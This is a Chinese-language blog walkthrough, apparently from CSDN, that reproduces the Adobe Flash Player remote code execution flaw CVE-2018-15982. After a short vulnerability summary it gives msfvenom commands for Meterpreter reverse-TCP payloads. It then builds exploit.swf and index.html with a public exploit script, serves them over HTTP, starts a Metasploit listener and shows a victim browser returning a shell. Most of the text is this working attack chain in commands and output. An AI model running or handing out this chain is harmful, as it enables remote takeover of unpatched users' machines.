![](https://i-blog.csdnimg.cn/blog_migrate/49ffad7205fd856638d919479029865d.png)
漏洞简介
漏洞名称 | Adobe Flash Player远程代码执行漏洞 |
---|---|
威胁类型 | 远程代码执行 |
威胁等级 | 高 |
漏洞ID | CVE-2018-15982 |
利用场景 | 攻击者通过网页下载、电子邮件、即时通讯等渠道向受害者发送恶意构造的Office文件诱使其打开处理,可能触发漏洞在用户系统上执行任意指令获取控制。 |
受影响系统及应用版本 | Adobe Flash Player(31.0.0.153及更早的版本) |
不受影响影响系统及应用版本 | Adobe Flash Player 32.0.0.101(修复后的最新版本) |
修复及升级地址 | https://get.adobe.com/flashplayer/ |
生成msf后门
[email protected]:~# msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.177.148 -f raw >86.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
[email protected]:~# msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.177.148 -f raw >64.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
![](https://i-blog.csdnimg.cn/blog_migrate/183471de84c172882130ee31333a8a55.png)
生成exploit
将msf生成的两个文件86.bin和64.bin放入脚本所在目录下,执行脚本,生成exploit
[email protected]:~/CVE-2018-15982_EXP-master# python CVE_2018_15982.py -i 86.bin -I 64.bin
[*] Done ! output file --> exploit.swf
[*] Done ! output file --> index.html
[email protected]:~/CVE-2018-15982_EXP-master#
![](https://i-blog.csdnimg.cn/blog_migrate/9422a745a85d946ccbac5115abefaf03.png)
开启本地HTTP服务
利用python自带服务,在脚本当前目录开启HTTP服务
[email protected]:~/CVE-2018-15982_EXP-master# python -m SimpleHTTPServer 8080
![](https://i-blog.csdnimg.cn/blog_migrate/bbdf29de5bef4663faa2bcbb21b3237f.png)
开启MSF反弹监听
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf exploit(multi/handler) > set LHOST 192.168.177.148
LHOST => 192.168.177.148
msf exploit(multi/handler) > run
![](https://i-blog.csdnimg.cn/blog_migrate/9a5c221e5fce67b878d7569672485149.png)
反弹shell
模拟受害者访问HTTP服务,触发漏洞,反弹shell
![](https://i-blog.csdnimg.cn/blog_migrate/6221372334b9e4122805e07406074b1d.png)
也许访问后IE会崩溃,未响应
![](https://i-blog.csdnimg.cn/blog_migrate/eb83cd04fca18dd57dfef56573d9d9a9.png)
但此时已经成功利用漏洞,反弹shell到msf上了
![](https://i-blog.csdnimg.cn/blog_migrate/dcc465ee5b6acf2b407e31d3a27208a4.png)
注意:当浏览器访问的标签页关闭了,反弹的shell也会断开连接
![](https://i-blog.csdnimg.cn/blog_migrate/11bc073c121ffc1c55337d4ad40f2192.png)